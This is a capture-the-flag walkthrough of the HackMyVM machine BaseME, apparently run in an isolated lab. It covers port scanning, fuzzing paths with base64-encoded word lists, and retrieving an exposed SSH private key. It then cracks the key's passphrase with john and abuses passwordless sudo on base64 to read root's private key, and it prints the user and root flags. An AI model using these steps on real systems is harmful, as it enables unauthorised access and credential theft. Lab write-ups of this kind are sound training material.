HackMyVM | BaseME

In this walkthrough, I demonstrate how I obtained complete ownership of BaseME from HackMyVM.
In: HackMyVM, Attack, CTF, Home Lab, Linux, Easy Challenge
ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access

Nmap Results

# Nmap 7.94SVN scan initiated Thu Nov 14 20:20:18 2024 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.16
Nmap scan report for 10.9.9.16
Host is up (0.00039s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 ca:09:80:f7:3a:da:5a:b6:19:d9:5c:41:47:43:d4:10 (RSA)
|   256 d0:75:48:48:b8:26:59:37:64:3b:25:7f:20:10:f8:70 (ECDSA)
|_  256 91:14:f7:93:0b:06:25:cb:e0:a5:30:e8:d3:d3:37:2b (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 14 20:20:31 2024 -- 1 IP address (1 host up) scanned in 12.91 seconds





Service Enumeration

TCP/80

Better viewed with curl due to the long output
Using curl, head, and base64 to decode the message
ℹ️
ALL that you need is in BASE64
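The decode step itself survives here only as the captions above. As an added example, not the post's own command, the script below does what the curl | base64 -d step does by hand: it pulls every run of base64-looking characters out of an HTML body, decodes the ones that actually decode, and drops runs that were ordinary words (a 16-letter word is valid base64 length-wise but decodes to binary junk). The sample page is constructed inline and only stands in for the real BaseME index; the hint sentence and the three-word list are the only details taken from the post.

```bash
#!/usr/bin/env bash
# Added example, not the original post's code: find and decode base64 runs in a page.

# Constructed stand-in for the BaseME index page (the real page is not reproduced).
# It carries the hint and the three-word list as base64 inside HTML comments, plus
# one long plain word that looks like base64 but is not.
sample_html() {
  cat <<EOF
<html><body>
<!-- $(printf '%s' 'ALL that you need is in BASE64' | base64 | tr -d '\n') -->
<!-- $(printf 'iloveyou\nyouloveyou\nshelovesyou\n' | base64 | tr -d '\n') -->
<p>nothingtoseehere, move along</p>
</body></html>
EOF
}

# decode_b64_runs: read HTML on stdin, print the decoded text of every run of
# 16+ base64 characters that decodes cleanly to printable text.
decode_b64_runs() {
  grep -oE '[A-Za-z0-9+/]{16,}={0,2}' | while IFS= read -r blob; do
    # base64 -d fails on bad length/padding; that already drops most plain words
    dec=$(printf '%s' "$blob" | base64 -d 2>/dev/null) || continue
    # a run that decodes to non-printable bytes is not a message, skip it
    printf '%s' "$dec" | LC_ALL=C grep -q '[^[:print:][:space:]]' && continue
    printf '%s\n' "$dec"
  done
}

# Against the live box this would be:  curl -s http://10.9.9.16/ | decode_b64_runs
sample_html | decode_b64_runs
```

The printable-text filter is what keeps long identifiers in real pages (minified JavaScript, hashes in asset names) from flooding the output; anything that is genuinely a hidden note decodes to text and survives it.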

At this point, my attack path is leaning towards the iloveyou, youloveyou, shelovesyou word list needing to be base64-encoded and sprayed at SSH in some combination.

Or... it's possible that some part of the URL on http://10.9.9.16/, or a parameter or header, is going to have the word BASE64 in it, in some variation of casing.

But none of these things are working for me at the moment when fuzzing. So, my next idea is to base64-encode the iloveyou, youloveyou, shelovesyou word list and spray each word at http://10.9.9.16/{base64-encoded-word-here}. But again, this didn't work for me, so maybe we just need a better word list.
# Read each line as data instead of splicing it into a bash -c string (a word
# containing quotes or $( ) would otherwise break out); the trailing newline
# that printf '%s\n' adds is deliberate, echo would add it too
while IFS= read -r w; do printf '%s\n' "$w" | basenc --base64url; done \
  < /usr/share/seclists/Discovery/Web-Content/big.txt > b64.txt

Take each word in the big.txt word list, base64-encode it (URL-safe alphabet, trailing newline included), and write the result out as a new word list

gobuster dir -u http://10.9.9.16 -w b64.txt -o baseme.txt -t 100
🥲
ℹ️
Not a win, but I sense that we're on the right track
while IFS= read -r w; do printf '%s\n' "$w" | basenc --base64url; done \
  < /usr/share/seclists/Discovery/Web-Content/combined_words.txt > b64.txt

Try a different word list

Very interesting ...





Exploit

Obscurity is not Security

Base64-encoded URLs were used to obscure sensitive files on the web server, and one such file, served at /aWRfcnNhCg== (the base64 of id_rsa followed by a newline), is an SSH private key, presumably for lucas.

curl -s http://10.9.9.16/aWRfcnNhCg== | base64 -d > id_rsa
chmod 400 id_rsa
ssh -i id_rsa lucas@10.9.9.16
The SSH private key is passphrase-protected. We can try to crack it with ssh2john.
ssh2john id_rsa > hash
⚠️
I tried cracking the id_rsa hash using rockyou.txt with john, but it was taking a while, so I figured something was off. Perhaps we need another base64-encoded word list.

🤔 What if the word list in the HTML comment is the word list we need?
# Encode each word both with and without a trailing newline: the passphrase was
# made with echo, so the newline is part of it (aWxvdmV5b3UK ends in K, i.e. "\n")
while IFS= read -r w; do printf '%s' "$w" | base64; printf '%s\n' "$w" | base64; done < list.txt > list_b64.txt
john --wordlist=list_b64.txt hash
john recovers the passphrase aWxvdmV5b3UK, which is iloveyou plus the trailing newline that echo appends, base64-encoded.
We're in!
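Both the directory fuzzing and the passphrase cracking hinge on one detail: echo appends a newline, so whoever built the box encoded names and the passphrase with a trailing newline (the Cg== in aWRfcnNhCg==, the K in aWxvdmV5b3UK), while an encoder that uses echo -n never produces those strings. As an added example that is not the post's own one-liners, the generator below emits every base64 spelling of each candidate word: standard and URL-safe alphabet, each with and without the trailing newline, deduplicated, and it reads its input as data rather than substituting words into a bash -c string. It needs only base64 and tr, so it does not depend on basenc being installed. The sample list is constructed; on the box the inputs were seclists' word lists and the three words from the HTML comment.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): base64 wordlist generator covering
# the encodings a target might have used for a URL path or a passphrase.

# b64_variants WORD
# Prints four spellings: standard / URL-safe alphabet, each with and without the
# trailing newline that `echo` (but not `printf '%s'`) appends before encoding.
b64_variants() {
  local w=$1 nonl nl
  nonl=$(printf '%s'   "$w" | base64 | tr -d '\n')   # what  echo -n "$w" | base64  gives
  nl=$(printf '%s\n'   "$w" | base64 | tr -d '\n')   # what  echo "$w"    | base64  gives
  printf '%s\n' "$nonl" "$nl"
  # basenc --base64url equivalent: swap + and / for - and _, keep the = padding
  printf '%s\n' "$nonl" "$nl" | tr '+/' '-_'
}

# b64_wordlist [FILE]   (reads stdin when no file is given)
# One variant per line, deduplicated. Lines are read as plain data, so a word
# containing quotes or $( ) cannot break out the way it can with xargs -I {} bash -c.
b64_wordlist() {
  while IFS= read -r w || [ -n "$w" ]; do
    [ -n "$w" ] && b64_variants "$w"
  done < "${1:-/dev/stdin}" | sort -u
}

# Constructed sample input; feed the result to gobuster -w or john --wordlist
printf 'id_rsa\niloveyou\nyouloveyou\nshelovesyou\n' | b64_wordlist
```

For words made only of letters, digits and underscores the two alphabets coincide and sort -u collapses them, so the list roughly doubles rather than quadruples; the URL-safe variants only matter for input containing bytes that encode to + or /.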





Post-Exploit Enumeration

Operating Environment

OS & Kernel

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Linux baseme 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux    

Current User

uid=1000(lucas) gid=1000(lucas) groups=1000(lucas),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Matching Defaults entries for lucas on baseme:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucas may run the following commands on baseme:
    (ALL) NOPASSWD: /usr/bin/base64    



Users and Groups

Local Users

lucas:x:1000:1000:lucas,,,:/home/lucas:/bin/bash
    

Local Groups

cdrom:x:24:lucas
floppy:x:25:lucas
audio:x:29:lucas
dip:x:30:lucas
video:x:44:lucas
plugdev:x:46:lucas
netdev:x:109:lucas
lucas:x:1000:    



Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:25:3a:82 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.16/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 4276sec preferred_lft 4276sec
    inet6 fe80::be24:11ff:fe25:3a82/64 scope link 
       valid_lft forever preferred_lft forever    





Privilege Escalation

Privileged File Read

During the post-exploit enumeration phase, we found that lucas has password-less sudo on /usr/bin/base64. base64 accepts any file as its input, so this is an arbitrary file read as root (the well-known GTFOBins sudo base64 primitive): /etc/shadow or root's SSH private key are equally reachable, and the only extra step is decoding the output on the far side of the pipe. Here root's key is read out and used for a local SSH login; had that key carried a passphrase, it would have needed cracking the same way lucas's did.

sudo /usr/bin/base64 /root/.ssh/id_rsa | base64 -d > ~/root_key
chmod 400 ~/root_key
ssh -i ~/root_key root@localhost



Flags

User

HMV8nnJAJAJA    

Root

HMVFKBS64    